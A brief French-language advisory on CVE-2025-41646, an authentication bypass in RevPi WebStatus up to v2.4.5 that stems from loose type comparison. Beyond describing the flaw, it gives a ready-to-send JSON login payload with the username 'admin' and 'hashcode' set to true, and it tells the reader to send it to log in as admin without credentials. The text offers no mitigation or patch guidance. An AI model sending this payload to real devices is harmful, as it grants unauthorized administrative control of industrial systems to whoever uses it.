
CVE-2025-41646 - Contournement d'authentification critique
CVE-2025-41646 - Contournement critique de l'authentification
Une vulnérabilité critique de contournement de l'authentification (CVE-2025-41646) dans RevPi WebStatus ≤ v2.4.5 permet à un attaquant de se connecter en tant qu'admin sans identifiants valides en raison d'une logique de comparaison de types faible (== vs ===).
Envoyez une requête de connexion avec :
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}